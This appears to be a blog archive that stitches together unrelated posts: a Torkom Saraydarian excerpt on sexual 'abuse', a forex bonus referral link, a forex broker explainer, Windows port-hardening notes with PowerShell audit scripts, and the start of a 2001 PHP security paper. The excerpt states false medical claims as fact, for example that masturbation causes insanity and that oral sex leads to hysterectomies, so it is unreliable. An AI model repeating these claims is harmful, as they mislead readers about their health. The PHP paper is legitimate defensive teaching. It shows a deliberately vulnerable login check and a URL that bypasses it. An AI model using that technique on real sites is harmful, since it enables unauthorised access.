Saturday, December 3, 2016

Sexual Abuse and Its Effects - Torkom Saraydarian


It is an esoteric fact that waste of sexual energy burns certain parts of the mental mechanism. No one else can determine for you how often it is healthy for you to have sex; only the physical and psychological results reveal this to you.

Those engaged in higher creative work and abstract thinking must conserve sexual energy. They will then notice how creativity, understanding and higher inspiration are developing successfully. If sexual energy is saved or economically used, it helps to develop the personality.

Sexual energy is spread throughout the aura. It creates the magnetic mechanism which secures higher impressions. If this substance is weak, disturbed, or even absent, impressions are not correctly secured, and with incorrect reception, confused interpretation results.

I remember a person who came to my Teacher in the monastery and asked for help. “My mind is not together,” he said. “I am becoming lazy, diffused, forgetful and irritable. I have many problems.” The Teacher looked into his eyes and asked, “How many women do you love?” “Three,” he answered. “You need to stay in the monastery for six months to restore your brain,” the Teacher said.

The man stayed in the monastery after making arrangements to take care of his family. He attended classes and participated in sacred dances, sports and labour. The Teacher did not let him have a moment’s rest from 5:00 am until 10:00 pm. The results were amazing. He became a new man.

I remember the Teacher saying to him, “Excessive sex disturbs the rhythm and harmony of your mental atoms and you hallucinate instead of think. It even causes visual deceptions. The section of your mind that records events mixes the events of the past and present and you experience mental chaos. You develop hypocrisy and eventually you hate yourself.”

Intercourse is a process of fusion with a person of the opposite sex. This fusion is physical, emotional and mental. When you fuse with someone else, you share each other’s karma. One person’s karma becomes two people’s karma through sexual relations, which can be good or bad. That is why you must have sexual relations with only one partner so that you do not load yourself with the karma and pollution of many others. Sexual relations multiply our karma and sometimes make us indebted to the other person forever. Their karma ties us to them until we pay it.

The Teaching says it is best to have only one wife or husband. In this way a couple can gradually build real fusion or unity on all levels. This is the goal of marriage.

The average person is not able to be truly strict in his sexual behaviour. It is better for a person on the spiritual path who is dedicated to a great service to have fewer burdens and debts. We must not forget that advancement on the path and expansion of our field of service is in direct proportion to the degree of our karmic debt. Often people who are ready to enter higher levels of consciousness are prevented from doing so by past karma and are chained to a routine life.

Having multiple sexual partners increases your ties. Often these ties prevent you from having freedom to advance in service. Those who stay together for longer periods or even for many lives, evoke deeper beauty from each other. Those who are married and have affairs with others create serious complications in their families, especially in the lives of their children.

Those who want to go forwards on the path of spiritual evolution must be very discriminative in their sexual life. Sex is a powerful and precious energy which must not be wasted. Intercourse must be an effort to contact the highest within each other and to provide vehicles for incoming souls or for precipitating higher ideas and visions.

Masturbation is an abuse of sexual energy. Masturbation is very unhealthy for men, women and children. It creates a tremendous pressure in the grey matter of the brain; the pineal and pituitary glands are affected, and mental concentration is weakened.

If a person feels an urge to masturbate, an excellent remedy is to wash the sexual organs or to douche with acidophilus. Acidophilus stops sexual stimulation because it disinfects germs and microbes that create artificial sexual stimulation. Even children who want to masturbate should wash with acidophilus.

There is a great difference between intercourse and masturbation. In intercourse the man’s aura and the woman’s aura mix, and their etheric, emotional and mental counterparts slowly adjust with each other, filling the reservoir with the creative sexual energy used during intercourse. In masturbation, the reservoir of energies which creates and replenishes the sexual energy is not formed. In masturbation, one draws upon his reserves and wastes them. So much pressure is put on the grey matter of the brain from the depletion of energies brought about by masturbation that lack of concentration, lack of daring and creativity, and even insanity can result.

In healthy sexual intercourse, the man absorbs the woman’s energies and the woman absorbs the man’s energies. The energy which is absorbed replaces the secretions released during intercourse. That energy creates etheric energy which recharges the blood. In masturbation there is no exchange or absorption of energies; there is only loss. Furthermore, during masturbation a person creates sexual thoughtforms which are difficult to eliminate.

Another form of sexual abuse which is very harmful is oral sex. Oral sex destroys the aura’s equilibrium and harmonious vibration. If a woman gives fellatio to the man, it causes her to absorb the man’s energy without returning any. There is no etheric and astral exchange in this way.

In some medical books I have read that semen is a tremendous nourishment for women in oral sex. Women may benefit, but men eventually collapse. Men develop serious diseases when they lose energy without replenishment. One doctor cited the case of a man who became very nervous, lost weight, and eventually lost control of his mind because of oral sex.

Oral sex can be very dangerous for the woman, as her mouth absorbs any germs or disorders from the man’s physical organs and sex center. Also, because the throat center has a different, higher vibration than the sex center, it can become damaged from this incorrect merging. Men also absorb germs and damage their throat centers by engaging in oral sex.

Never let any man kiss your genitals or your breasts. Gum disease or decaying teeth carry infection to your organs or breasts. The breasts absorb germs and viruses from bleeding gums which weaken the woman and make her susceptible to disease. For similar reasons women should never let men touch them with unwashed hands during sexual relations.

Oral sex is a sign of retrogression, of going towards bestiality. It creates terrible interference between the throat and sex centers when they are forced into intercourse. In oral sex the throat center mixes with the etheric sex center and creates tremendous complications. Putting one’s throat center in contact with the sex center of another, lowers the frequency of the throat center and creative energy is lost.

In animals the throat and sex centers form a single unit, one not yet differentiated into two, as in the human being. This means that oral sex does not hurt animals while it does hurt human beings. The human throat center is the blooming of the sublimated sex center; it is the higher counterpart of the sex center.

A woman who practices oral sex pollutes her throat center with the low, coarse vibrations of the sex center, creating imbalance in her system. If a woman is highly advanced creatively, an artist or a singer, a year or two of oral sex may cause serious problems in her sexual organs. Most women I know who have had hysterectomies have practiced oral sex.

Oral sex alters the auras of both partners. The man becomes more feminine and the woman becomes more masculine. This happens because in oral sex the woman channels to the man the female principle and the man channels to the woman the male principle.

Certain ways of kissing are also very damaging. When you kiss by sucking each other’s tongue and the insides of the mouth, you infect yourself with microbes. All the germs and weaknesses of the body are carried in saliva. Some eye diseases stem from problems in the sexual organs. Through such kissing, blood diseases are also transmitted. Sometimes tuberculosis microbes are dormant in the organs and are transmitted to others and become active.

Men sometimes have intercourse but do not ejaculate as a method of birth control, or because they think they are saving their energies. This is a very harmful action. When a man’s penis is stimulated, the body creates excess seminal fluid to be used in the orgasm. When this fluid is not released, it accumulates and puts pressure on the testes and other glands. This accumulated pressure throws the whole body out of balance, causing the etheric counterpart of the sexual organs to swell etherically.

I spoke with several men who had their testes removed because of tumour or cancer, and all said they had practiced withholding ejaculation for a long time.

Some people think that a way to increase energy is to enjoy sex without orgasm. Such sex does not increase the etheric energy; on the contrary, the pressure on the sexual organs becomes so intense that after a few years those organs start to degenerate. Those who have intercourse without orgasm dig their own graves.

A certain group I knew experimented in this kind of sex. At first they felt very good. I told them to wait for two years before forming a conclusion. At the end of that period many of them had developed tumours and other sexual problems. Any abuse of Nature causes disease. We must learn not to exploit Nature.

Most weakness is not caused by lack of energy, but from excessive energy or congestion. We think we can fool Nature and draw pleasure from it without using energy, but we cannot fool Nature. If a man does not want to ejaculate, he should not become sexually stimulated.

Intercourse in the early morning is also very damaging. Many heart problems stem from early-morning intercourse. When you have sex in the morning your energy is exhausted, but you must get up and go to work, handle problems and deal with daily stress. Because you are exhausted you become irritated more easily.

If you have a headache in the morning after having intercourse the night before, it is a sign that something is wrong. There can be many causes for it, so you must find the right one. The headache could be caused by lack of energy. The sexual act is related to the liver, the heart, the brain, the spinal fluid and every chakra.

In the mental body there is also a sex center which is related to everything that you are. This center can be damaged in various ways and cause impotency or a feeling of sexual rejection. For example, if during intercourse you are shocked by bad news, an explosion or some kind of interference, this center closes up and is often damaged. If your partner creates jealousy, irritation, or disturbances in you by talking about other women or men while you are having sex, the sex center in the mental body becomes damaged. If the damage is serious enough, you first feel sexual repulsion; then you develop impotency or frigidity.

Many people now claim that it is healthy and natural for parents to have sex in front of their children. Such behaviour is very destructive for the children’s future. When a child watches his parents have intercourse, he does not become stimulated at that time because his sex center is closed and there is no response from it. But the image or thoughtform of sex is stored in his mind. Later, when the child’s sex center starts to become active, that sexual thoughtform will rush to the center, obsess it and urge him to have sex because of the image of his parents’ sexual intercourse. This happens anywhere between the ages of ten and fifteen and it is one of the causes of premature sexual stimulation in children. When such children become sexually mature, they feel so much pressure from the images accumulated in them that they are not able to control their sexual urges.

Rape is another form of sexual abuse. A man who rapes a woman is drinking a cup of poison. When a man forces a woman to have sex with him, her aura becomes poisonous for him. All the irritation, imperil, negativity, and karmic poisons in the aura of the woman enter the aura of the man. The rapist becomes even more sick mentally; he starts to fail in his business and he becomes a greater problem to society.


Sexual abuse has the following effects on the physical body:
1. Sexual abuse causes the body to lose its immune system, its defence mechanism against disease. As soon as you see that you are absorbing germs, refrain from sex so that you can refill your reservoir.
2. Sexual abuse weakens the nervous system and makes you shaky. Test whether you are having too much sex by stretching out your fingers and seeing if they tremble. Another test is to see whether you can stand on one foot without leaning, wobbling or moving at all.
3. Sexual abuse makes people lazy and sleepy and leads to inertia. When people complain that they cannot find a job, I ask them how often they have sex. Once they abstain for three or four months, usually the right job is waiting for them.
Whenever you want more sleep, it is usually because you lack energy. Sleep is the body’s automatic response mechanism to save energy. Tiredness is not always caused by waste of sexual energy, but wasting sexual energy is characterized by tiredness. Laziness is another effect of wasting sexual energy. When you conserve sexual energy, it is easy to wake up early, get chores done quickly, and do all the things you need to do. You have enthusiasm and interest, not only for your own activities, but also for your spouse, family and friends.
Enthusiasm and interest are operated solely on the fuel of sexual energy. If you do not have the fuel of sexual energy, you are an interesting or an interested person.
4. With sexual abuse the colour of the body becomes pale and the tissue around the eyes becomes dark; the voice becomes hoarse, lower and unclear, and it loses its energy. Singers immediately notice the effects of sexual abuse. I knew a great voice teacher in the Middle East who had a special soprano student with an outstanding voice. One day the student told the teacher she was going to be married. The teacher told her, “I hope you will be moderate in sex because if you are not, you may lose your voice.” The woman married a young man, did not follow her teacher’s advice, and gradually lost the outstanding quality of her voice.
Singing is related to the sex and throat centers. To be a great singer does not mean that you can never have sex, however, you cannot waste your energy and continue to be a great singer.
5. Sexual abuse leads to impotency at an early age. I have counselled thousands of people and most of their problems stem from impotency and frigidity. These are two of the major causes for divorce. Usually when I inquire into the background of such people, I find that they started having sex when very young.
Every real genius and server of humanity has control over and sublimation of his sex drive. A well-known Russian ballet dancer once told me that he had sex with his wife only once a month or once every two months. “It’s because I can’t dance if I have it more often,” he said. The energy and the elasticity for dancing come from the accumulation of sexual energy.
6. Because of sexual abuse, weaknesses develop in our relationships with others. Those who can live together the longest are those who economize their sexual energy. The ties of relationships slowly weaken and dissolve when sexual energy is wasted.
7. A person who abuses sex may have weak or retarded offspring, or offspring who have a strong inclination toward sex at an early age.
Whatever you are, you will produce the same kind. Such energies are so embedded in your aura that you will pass these same urges and drives on to your children. A normal child does not even think about sex until age sixteen or seventeen.
8. Sexual abuse leads to sickness and problems in life.
9. If a person’s body is still growing when he starts to abuse his sexual energy, his body will not reach its full height. A child who abuses sexual energy will often stop growing after age sixteen. This is a very serious condition, when we consider that normally a young woman can grow until age twenty-seven.
10. Sexual abuse weakens the eyesight.
11. Sexual abuse weakens the heart and may lead the person to heart disease.
12. Sexual abuse may lead to cancer. The cells of the body work overtime to replace the energy drained by sexual abuse.
13. Sexual abuse may lead to various other organic difficulties.
14. Those who abuse their sexual energy live twenty to thirty years less than they normally would have. I know many men who died young, in their thirties and forties, as a result of wasting sexual energy, particularly through masturbation.
15. Sexual abuse damages the pineal, pituitary and carotid glands.
The emotional effects of sexual abuse are:
1. nervousness
2. the urge to gossip
3. nosiness
4. irritability
5. destructiveness
6. indifference to responsibility and duties
7. desire to steal and an inclination toward crime
8. jealousy
9. selfishness
10. pessimism
11. a sense of isolation and wanting to be alone
12. hatred for the beauty in others
13. sneakiness
14. loss of magnetism of the aura
The mental effects of sexual abuse are:
1. loss of moral principles
2. no drive for achievement
3. lack of striving to know, to serve, to lead
4. mental diffusion
5. no higher goals
6. no contact with the Inner Guide
7. attempting to exploit people
8. misleading others
9. development of hatred and separatism
10. lying
11. vanity
12. showing off
13. various complicated mental problems and insanity coming to the surface
The spiritual effects of sexual abuse include the following:
1. The person is prevented from contacting higher spiritual energies. Celibacy is important before expansion of consciousness and initiations.
2. The knowledge petals lose energy and cannot unfold. As a result, wisdom is lacking on the three levels of the personality and the person falls into confusion. (The knowledge petals are found in each personality vehicle as a reservoir of knowledge and wisdom). When these petals are burned by sexual abuse, the person hears voices from the etheric and astral planes and no longer has control over his own speech.
3. The person can become obsessed.
4. The throat center becomes damaged.
5. Creative energy decreases in the mental body and the person cannot formulate or evoke higher concepts.
6. Ugly imagination develops.
7. The aura becomes polluted and contact with the forces of Nature is hindered. The aura is the mechanism of impressions. Only a pure aura is magnetic enough to allow the person to be approached by devas or Masters.
8. Telepathic communication stops.
9. Karma drastically increases for the person.
10. Relationships become very complicated.
11. Their children’s future is ruined.

When a person wastes sexual energy, he depletes love energy. This leads to depression, failure, destructive activities, irresponsibility, degenerative diseases, and even suicide. With a mind bereft of health, sanity and balance, the person introduces anti-survival directions into the seven fields of human endeavour. Politics becomes corrupted. Education is reduced to manipulation. Communication becomes a science of cleavages. Art falls into prostitution. Religion turns into fanaticism. Economics creates deficits and depression.


-Torkom Saraydarian
Sex, Family and the Woman in Society

Thursday, November 10, 2016

Risk Free $123+$5 No Deposit Bonus Forex For New Account/Registration


Register Here : https://fbs.com/

Tuesday, June 21, 2016

Types of Retail Forex Brokers: ECN vs DMA vs STP vs Market Maker


DD/MM (Market Maker: brokers that have dealing desks)

DD/MM Dealing Desk Brokers (or Market Makers):
  • Act as a counterparty for client transactions
    • Route orders through dealing desks
    • “Make the market” and trade against clients. (They take the opposite side of the trade: when traders want to sell, they buy from them; when traders want to buy, they sell to them.)
    • Dealing desk brokers are able to profile their clients. They systematically divide clients into groups with an algorithm (usually called “A Book” and “B Book”).
      • “A Book” automation for losing clients: the broker automatically takes the other side. Losing trades of clients are counter-traded and become the broker’s profit. More losing traders means more profit for the broker.
      • “B Book” automation for winning clients: the broker automatically takes the other side and then hedges the position in the real market that it has access to (e.g. when traders buy, the broker sells to them, then buys the same amount in the real market). This is also done automatically by algorithm. In this case the broker also makes money (through spread or commission).
  • Fixed spreads
  • Makes money through spreads and when a client loses a trade.
  • Price Manipulation is possible. Traders can’t see the real market quotes.
  • Transparency of dealing desk brokers differs depending on their own company rules.

NDD (No Dealing Desk) Forex Brokers

  • Act as an intermediary
    • No dealing desk = No market making = Straight-through processing
    • Straight-through processing enables the trade process to be conducted electronically without manual intervention
    • Provides access to the interbank market without a dealing desk. All orders are passed to Liquidity Providers (LPs) directly.
  • No re-quotes and no additional pausing when confirming orders.
  • Makes money by commission or spreads
  • In the retail FX markets there are usually 2 types of NDD forex brokers: regular STP forex brokers and ECN forex brokers.
Benefits of No Dealing Desk brokers
  • Anonymity. Clients’ orders are executed automatically, immediately and anonymously. There is no dealing desk watching your orders.
  • Better and faster fills, because all participants or liquidity providers compete for prices in a real market.
  • Transparency.

Liquidity providers (LPs)

  • Liquidity providers act as ‘supplier’ for forex brokers. Both LPs & forex brokers need to make money.
  • With NDD forex brokers, the LP(s) are the counterparty to your trades. They take the opposite side of your position and look to make money by closing this position later in a trade with another party.
  • Prices are determined by LP(s)
    • LPs compete for providing the best bid/ask rates for orders from brokers.
    • More LPs usually means more depth in the liquidity pool, thus better spreads.
    • Traders usually get variable spreads.
  • Number of Liquidity providers
    • One liquidity provider. Some so-called ‘STP’ brokers have only one LP, so there is no price competition; their role is in fact just that of an IB (Introducing Broker). The LP controls the price (spread). Maintenance costs are lower, but the broker becomes completely dependent on the one LP.
    • Most STP brokers have a predetermined number of liquidity providers.
    • ECN brokers have a large number of liquidity providers.

STP Forex Brokers

  • STP Forex Brokers don’t trade against clients
  • Make money through spread mark-ups. They add small mark-ups to the best bid and ask rates they get from LPs, for example adding a pip to the best bid price or subtracting 0.6 pip from the best ask price of their LPs.
  • No dealing desk & No dealer intervention. Clients’ orders are directly sent to a certain number of liquidity providers (Banks or Other Brokers)
  • More liquidity providers means more liquidity and better fills for the clients.
  • Provide access to the real-time market quotes
  • Those STP Brokers that have fixed spreads won’t adjust spreads based on the lowest bid/ask prices offered by LPs. The fixed spreads they charge are higher than the best quotes they get from LPs. They may use their back-office price matching system to make sure they can make profits on spread difference while hedging the trades with LP(s) at better rates at the same time.

Direct Market Access

Forex DMA refers to electronic facilities that match orders from traders with bank market maker prices. It enables buy-side traders to trade in a transparent, low latency environment.
  • Direct access to the market. All orders are passed to LPs directly
  • Traders can place orders with LPs (banks, market makers, other brokers, etc.).
  • Only Market execution. STP brokers that offer Market execution provide true Direct Market Access (DMA).
    • Market execution is more transparent. Orders go to the market and are filled based on available quotes from LPs. (STP+DMA brokers will add a small mark-up in order to make a profit.)
    • Instant execution is less transparent. Orders don’t go to the market. They are instantly filled by the broker, who then may (or may not) offset its own risks with LPs. Some STP forex brokers fill clients’ orders through Instant execution, after which they hedge these orders with their LPs in order to make profits. If there are no profitable hedging opportunities when traders submit their orders, they may experience re-quotes.
  • Orders are facilitated by brokers. The broker is not a market maker or liquidity destination on the DMA platform it provides to clients.
  • Platforms build a fixed mark up into the client’s dealing price and/or charge a commission.
  • Only variable spreads
  • optional: Depth of the market book access (DOM access)
  • ECN forex brokers always offer DMA, some STP brokers offer DMA

STP Forex Brokers that offer DMA:  

List of STP+DMA brokers  http://tradingt.com/dma/
STP+DMA Benefit
  • Anonymous platforms ensure neutral prices reflecting global FX market conditions.
  • There are no re-quotes, rate rejections or partial fills with the DMA model because their liquidity providers are committed to their bid/ask offers
  • Competitive prices
  • Transparency
  • Welcomes all trading styles
STP vs STP with DMA
  • STP+DMA brokers have more liquidity providers thus better prices for clients.
  • STP+DMA brokers always offer variable spreads; some STP forex brokers offer fixed spreads.
  • DMA order execution is always Market execution.
  • There are no re-quotes with the DMA model.
  • The DMA model allows all trading styles: scalping, news trading, swing trading, position trading, etc.
List of STP brokers http://tradingt.com/stp/

ECN Forex Brokers (ECN=Electronic Communications Network)

List of ECN Forex brokers: http://tradingt.com/ecn/ List of Metatrader ECN Forex brokers: http://tradingt.com/mt4-ecn/
ECN Brokers
  • ECN brokers pass your trades to an ECN pool, in which other liquidity providers (banks, hedge funds, brokers, individual traders) become a counterparty to your trade.
  • All participants (banks, market makers and retail traders) trade against each other by sending competing bids and offers into the system.
  • Allow clients’ orders to interact with each other.
  • Orders are matched between counter parties in real time.
  • Participants get the best offers for their trades available at the time.
  • Only variable spreads
  • Make money only through commission. ECN brokers do not make money on spreads (bid/ask difference).
  • Display the Depth of the Market (DOM) in a data window. Traders can show their order size and other traders can hit those orders. They can see where the liquidity is.
ECN Benefit
  • Anonymous trading environment.
  • Straight through processing with banks liquidity.
  • All trading styles are welcome
  • Interbanks prices and spreads. Greater number of marketplace participants means tighter spreads.
  • Greater price transparency, faster processing, increased liquidity.
ECN vs STP Brokers with DMA
  • ECN is the most transparent model. An ECN forex broker provides a marketplace where all its participants trade against each other in real time.
  • Both offer only variable spreads;
  • STP+DMA Brokers will also add a small mark-up to make profit. ECN Brokers charge commission.
  • Both have fractional pricing;
  • Both have DOM (Depth of the Market) orders book. STP+DMA Brokers usually don’t show it to you.

Hybrid Model

  • Many brokers offer a dealing desk account, an ECN account and an STP account at the same time. Traders can choose the one they like.
  • The Cents Account or Mini Account of an STP broker is usually the account that has a dealing desk. Small orders by traders (usually below 0.1 lot) can’t be sent to the liquidity providers, because they don’t accept small orders under the contract they have with the forex broker. So brokers usually use the dealing desk model for this type of account.
  • Usually, for orders above 0.1 lot, STP brokers send orders directly to their liquidity providers with the STP model.

Conclusion

  • Dealing desk brokers or market makers make money on spreads and when clients lose trades. More winning traders will increase the operational risk of a dealing desk broker.
  • No dealing desk brokers are more transparent. They want their clients to win because clients’ losses are not their profit, and the more clients trade, the more profit for them (through commission or a small spread mark-up).
  • Not all forex brokers will be honest with you, so whether you choose ECN, STP, or market maker, it’s important to trade with a broker that has a good reputation.

Monday, May 30, 2016

Disable Microsoft Network Discovery port 5357

Port: 5357 (tcp, udp), service name: wsdapi

Used by Microsoft Network Discovery; should be filtered for public networks. Disabling Network Discovery for any public network profile should close the port unless it's being used by another potentially malicious service.

To disable Network Discovery for a public profile, navigate to:
- Control Panel\Network and Internet\Network and Sharing Center\Advanced sharing settings
- disable Network Discovery for any public network

Port should be correctly mapped by the Windows Firewall to only accept connections from the local network.

Malicious services using this port:
Trojan.win32.monder.gen (a.k.a Trojan.Vundo)

Port is also IANA registered for:
Web Services for Devices (WSD) - a network plug-and-play experience that is similar to installing a USB device. WSD allows network-connected IP-based devices to advertise their functionality and offer these services to clients by using the Web Services protocol. WSD communicates over HTTP (TCP port 5357), HTTPS (TCP port 5358), and multicast to UDP port 3702.
Source: SG

IANA entry: 5357 tcp,udp wsdapi - Web Services for Devices
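
An added example, not part of the original post: a read-only PowerShell audit of the checks described above, showing what is listening on TCP 5357 and which process owns it, which network category each interface is in, and which enabled inbound firewall rules expose the port on the Public profile. It assumes Windows 8 / Server 2012 or later, where the NetTCPIP and NetSecurity cmdlets are available.

```powershell
# Added example (not from the original post). Read-only audit: changes nothing.
# Assumes Windows 8 / Server 2012 or later (NetTCPIP and NetSecurity modules).
$port = 5357

# 1. Is anything listening on TCP 5357, and which process owns the socket?
#    WSD is served through HTTP.sys, so the owner is normally PID 4 (System).
#    A different owner is the "another service" case the post warns about.
Get-NetTCPConnection -LocalPort $port -State Listen -ErrorAction SilentlyContinue |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress = $_.LocalAddress
            LocalPort    = $_.LocalPort
            OwningPid    = $_.OwningProcess
            ProcessName  = $proc.ProcessName
        }
    } | Format-Table -AutoSize

# 2. Which network category (Public, Private, DomainAuthenticated) is each
#    connected interface in right now?
Get-NetConnectionProfile |
    Select-Object InterfaceAlias, Name, NetworkCategory |
    Format-Table -AutoSize

# 3. Enabled inbound allow rules that name TCP 5357 and apply to the Public
#    profile. Rules that cover the port only through 'Any' or a port range
#    are not expanded here.
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow |
    Where-Object { "$($_.Profile)" -match 'Public|Any' } |
    ForEach-Object {
        $portFilter = $_ | Get-NetFirewallPortFilter
        if ($portFilter.Protocol -eq 'TCP' -and @($portFilter.LocalPort) -contains "$port") {
            $addrFilter = $_ | Get-NetFirewallAddressFilter
            [pscustomobject]@{
                DisplayName   = $_.DisplayName
                DisplayGroup  = $_.DisplayGroup
                Profile       = "$($_.Profile)"
                RemoteAddress = ($addrFilter.RemoteAddress -join ',')
            }
        }
    } | Format-Table -AutoSize -Wrap
```

A rule listed in step 3 whose RemoteAddress is not LocalSubnet accepts the port from beyond the local network, which is what the post says the firewall should prevent.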

Disable NetBIOS port 137 138 139

To disable NetBIOS over TCP/IP support
  1. From the Network and Dial-up Connections icon in Control Panel, select Local Area Connection and right-click Properties.
  2. On the General tab, click Internet Protocol (TCP/IP) in the list of components, and click the Properties button.
  3. Click the Advanced button.
  4. Click the WINS tab. Click Disable NetBIOS over TCP/IP.



    source : https://technet.microsoft.com/en-us/library/cc940063.aspx
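
An added example, not from the original page: the same setting applied to every IP-enabled adapter from PowerShell through the WMI class Win32_NetworkAdapterConfiguration, followed by a check that nothing still listens on ports 137, 138 and 139. The function name Disable-NetbiosOverTcpip is a hypothetical helper introduced here; run it from an elevated prompt.

```powershell
# Added example (not from the original page). Run from an elevated prompt.
# TcpipNetbiosOptions: 0 = take the setting from DHCP, 1 = enabled, 2 = disabled.
function Disable-NetbiosOverTcpip {   # hypothetical helper name
    [CmdletBinding(SupportsShouldProcess)]
    param()

    $adapters = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
    foreach ($adapter in $adapters) {
        if ($adapter.TcpipNetbiosOptions -eq 2) { continue }   # already disabled
        if ($PSCmdlet.ShouldProcess($adapter.Description, 'Disable NetBIOS over TCP/IP')) {
            $result = Invoke-CimMethod -InputObject $adapter -MethodName SetTcpipNetbios `
                -Arguments @{ TcpipNetbiosOptions = [uint32]2 }
            # ReturnValue 0 = success, 1 = success but a reboot is required.
            [pscustomobject]@{
                Adapter     = $adapter.Description
                ReturnValue = $result.ReturnValue
            }
        }
    }
}

# Current state of each IP-enabled adapter.
Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
    Select-Object Index, Description, TcpipNetbiosOptions |
    Format-Table -AutoSize

# Preview which adapters would change; remove -WhatIf to apply.
Disable-NetbiosOverTcpip -WhatIf

# After applying: NetBIOS name (137/udp), datagram (138/udp) and session
# (139/tcp) listeners should be gone. No output means nothing is bound.
Get-NetUDPEndpoint -LocalPort 137, 138 -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess
Get-NetTCPConnection -LocalPort 139 -State Listen -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess
```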

Sunday, May 29, 2016

A Study In Scarlet Exploiting Common Vulnerabilities in PHP Applications

From:  "Shaun Clowes" <shaun@securereality.com.au>
To:  <bugtraq@securityfocus.com>
Subject: A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
Date:  Tue, 3 Jul 2001 00:37:00 +1000

SecureReality is pleased to announce the release of our new paper entitled
'A Study In Scarlet - Exploiting Common Vulnerabilities in PHP
Applications'. The paper is based on the speech I presented at the Black Hat
Briefings in Asia in April this year and is accompanied by 4 advisories (of
which one will be released at a later date). The paper can be downloaded
from http://www.securereality.com.au/archives.html and a copy has been
attached to this email.

Sincerely,
Shaun Clowes
SecureReality Pty Ltd


<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

                           A Study In Scarlet
          Exploiting Common Vulnerabilities in PHP Applications

                                                                Shaun Clowes
                                                               SecureReality

"A reprint of reminisces from the Blackhat Briefings Asia 2001"

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

--- < Table of Contents > --------------------------------------------------

1. Introduction
2. Caveats and Scope
3. Global Variables
4. Remote Files
5. File Upload
6. Library Files
7. Session Files
8. Loose Typing And Associative Arrays
9. Target Functions
10. Protecting PHP
11. Responsibility - Language vs Programmer
12. Other

"I could imagine his giving a friend a little pinch of the latest vegetable
alkaloid, not out of malevolence, you understand, but simply out of a spirit
of inquiry in order to have an accurate idea of the effects." - Stamford

--- < 1. Introduction > ----------------------------------------------------

This paper is based on my speech during the Blackhat briefings in Singapore
and Hong Kong in April 2001. The speech was entitled "Breaking In Through
the Front Door - The impact of Web Applications and Application Service
Provision on Traditional Security Models". It initially discussed the trend
towards Web Applications (and ASP) and the holes in traditional security
methodology exposed by this trend. However, that's a long and boring
discussion so I'll save it for the policy makers.

The rest of the speech was spent talking about PHP. For those reading this
paper who don't know what PHP is, PHP stands for "PHP Hypertext
Preprocessor". It's a programming language (designed specifically for the
Web) in which PHP code is embedded in web pages. When a client requests a
page, the Web Server first passes the page to the language interpreter so
the code can be executed, the resulting page is then returned to the client.

Obviously this approach is much more suited to the page by page nature of
web transactions than traditional CGI languages such as Perl and C. PHP (and
to some extent other Web Languages) has the following characteristics:
 + Interpreted
 + Fast Execution - The interpreter is embedded in the web server, no fork()
or setup overhead
 + Feature Rich - Hundreds of non trivial builtin functions
 + Simple Syntax - Non declared and loosely typed variables, 'wordy'
function names

Over the course of this paper I'm going to try to explain why I feel the
last two characteristics make applications written in PHP easy to attack and
hard to defend. Then I'll finish off with a rant about distribution of
'blame' when it comes to software security.

"You must study him, then ... you'll find him a knotty problem, though. I'll
wager he learns more about you than you about him." - Stamford

--- < 2. Caveats and Scope > -----------------------------------------------

Almost all the observations in this paper refer to a default install of PHP
4.0.4pl1 (with MySQL, PostgreSQL, IMAP and OpenSSL support enabled) running
as a module under Apache 1.3.19 on a Linux machine. This of course means
that your mileage may vary, in particular, there have been many many
versions of PHP and they sometimes exhibit vastly different behaviour given
the same input.

Also, proponents of PHP tend to defend the language based on its extreme
configurability. I feel very confident the vast majority of users will not
modify the default PHP configuration at all, lest some of the amazing array
of freely available PHP software stop working. Thus I don't feel pressured
to defend my position based on configuration options, nonetheless I've
included a section about how to go about defending PHP applications using these
configuration options.

Finally, some people deride this kind of work as 'trivial' or 'obvious',
particularly since I won't be discussing any specific vulnerabilities in
particular pieces of PHP software. To prove the risks are real and that even
programmers who try hard fall into these traps, 4 detailed advisories in
regards to specific pieces of vulnerable software will be released shortly
after this paper.

"I have to be careful ... for I dabble with poisons a good deal." - Sherlock
Holmes

--- < 3. Global Variables > ------------------------------------------------

As mentioned earlier, variables in PHP don't have to be declared, they're
automatically created the first time they are used. Nor are they
specifically typed, they're typed automatically based on the context in
which they are used. This is an extremely convenient way to do things from a
programmer's perspective (and is obviously a useful feature in a rapid
application development language). Once a variable is created it can be
referenced anywhere in the program (except in functions where it must be
explicitly included in the namespace with the 'global' function). The result
of these characteristics is that variables are rarely initialized by the
programmer, after all, when they're first created they are empty (i.e "").

Obviously the main function of a PHP based web application is usually to
take in some client input (form variables, uploaded files, cookies etc),
process the input and return output based on that input. In order to make it
as simple as possible for the PHP script to access this input, it's actually
provided in the form of PHP global variables. Take the following example
HTML snippet:

 <FORM METHOD="GET" ACTION="test.php">
 <INPUT TYPE="TEXT" NAME="hello">
 <INPUT TYPE="SUBMIT">
 </FORM>

Obviously this will display a text box and a submit button. When the user
presses the submit button the PHP script test.php will be run to process the
input. When it runs the variable $hello will contain the text the user
entered into the text box. It's important to note the implications of this,
this means that a remote attacker can create any variable they wish and have
it declared in the global namespace. If instead of using the form above to
call test.php, an attacker calls it directly with a url like
"http://server/test.php?hello=hi&setup=no", not only will $hello = "hi" when
the script is run but $setup will be "no" also.

An example of how this can be a real problem might be a script that was
designed to authenticate a user before displaying some important
information. For example:

 <?php
  if ($pass == "hello")  // password check
   $auth = 1;            // only ever set here, never initialized
  // ...
  if ($auth == 1)
   echo "some important information";
 ?>

In normal operation the above code will check the password to decide if the
remote user has successfully authenticated then later check if they are
authenticated and show them the important information. The problem is that
the code incorrectly assumes that the variable $auth will be empty unless it
sets it. Remembering that an attacker can create variables in the global
namespace, a url like 'http://server/test.php?auth=1' will fail the password
check but the script will still believe the attacker has successfully
authenticated.

To summarize the above, a PHP script _cannot trust ANY variable it has not
